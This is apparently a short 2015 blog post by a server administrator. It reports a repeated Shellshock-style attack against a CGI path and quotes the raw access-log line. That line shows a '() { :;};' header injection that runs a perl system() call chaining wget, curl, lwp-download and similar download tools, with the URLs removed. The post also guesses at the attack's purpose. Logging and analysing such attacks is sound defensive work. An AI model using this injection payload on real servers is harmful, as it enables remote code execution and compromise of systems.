Samstag, 25. April 2015

perl script injection again

The same style as reported some days ago has hit the system again last night - - [25/Apr/2015:09:11:48 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 477 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http// ; wget --no-check-certificate ; curl http// ; curl -k ; lwp-download ; GET ; lynx ; wget ; curl ; fetch ; lwp-download ; GET ; lynx\");'"
By using the commands above ( wget --no-check-certificate) it seems that the idea behind this attack was to download and replace the index.html page. So just for the record, if you have a index.html page already within the download directory, wget will simple put a index.html.1 page there. When you only have a index.php, this attack maybe could work, but seems to be odd.

The system was again hit for 30 times within a short time range. So even it would worked, it would result in 30 index.html files.

When testing the link against virustotal, there was no result